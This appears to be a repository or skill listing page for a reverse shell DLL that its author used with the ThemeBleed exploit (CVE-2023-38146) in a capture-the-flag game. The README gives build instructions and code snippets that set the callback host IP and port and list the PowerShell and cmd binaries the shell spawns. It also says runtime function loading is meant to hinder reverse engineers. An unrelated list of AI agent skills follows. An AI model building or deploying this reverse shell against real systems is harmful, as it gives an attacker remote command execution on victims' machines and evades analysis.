ThemeBleedReverseShellDLL
Reverse shell i used in combination with the ThemeBleed exploit.
Install / Use
/learn @Jnnshschl/ThemeBleedReverseShellDLLREADME
ThemeBleed Reverse Shell DLL
Example reverse shell DLL I used in combination with the ThemeBleed exploit (https://github.com/Jnnshschl/CVE-2023-38146) in a CTF.
Some functions will be loaded at runtime using my RTFN stuff, this makes analysis of this shell a big pain for reverse engineers.
Make sure to build as "Release" and adjust these vars to your need:
constexpr auto rHost = "10.10.14.158";
constexpr auto rPort = "4711";
constexpr auto autoReconnect = false;
The shell is going to search for executables in the order which they appear in this array:
const char* rBinaries[]{
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"C:\\Windows\\System32\\cmd.exe",
"powershell.exe",
"cmd.exe"
};
Related Skills
node-connect
349.7kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
109.7kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
349.7kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
qqbot-media
349.7kQQBot 富媒体收发能力。使用 <qqmedia> 标签,系统根据文件扩展名自动识别类型(图片/语音/视频/文件)。
